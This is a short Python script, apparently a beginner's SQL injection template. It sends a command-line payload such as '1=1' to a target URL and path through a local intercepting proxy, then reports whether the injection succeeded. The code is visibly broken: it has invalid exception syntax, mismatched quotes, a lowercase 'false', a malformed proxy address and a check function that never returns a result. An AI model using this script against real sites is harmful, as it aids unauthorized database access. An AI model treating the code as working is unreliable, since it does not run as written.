import requests
import sys
import urllib3

proxies = {'http' : 'http://127.0.0.1:8080', 'https': 'https://127.0.0.8080'}

def exploit_sqli(url, uri, payload):
	r = requests.get(url + uri + payload, verify=false,proxies=proxies )
	print(r)
	#if "Something to lookfor" in r.text:
	#	return True
	#else:
	#	return False


if __name__ == '__main__":
	try:
		url = sys.argv[1].strip()       # This is frist CLI arg URL
		uri = sys.argv[2].strip()
		payload = sys.argv[3].strip()	  # This is second CLI arg which is injection to use 
	except: IndexError:
		print (" [-] Usage: %s <url> <payload>" sys.argv[0]) 
		print (' [-] Example: %s url:www.example.com  uri:/dir/sdir payload:"1=1"' )
		print (' [-] Example: %s www.example.com /dir/sdir "1=1"' )
		sys.exit(-1)

	if exploit_sqli( url, uri, payload):	# Calls function is true or false lets us know
		print(" [+] SQL Injected")
	else:
		print(" [-] Retry!")
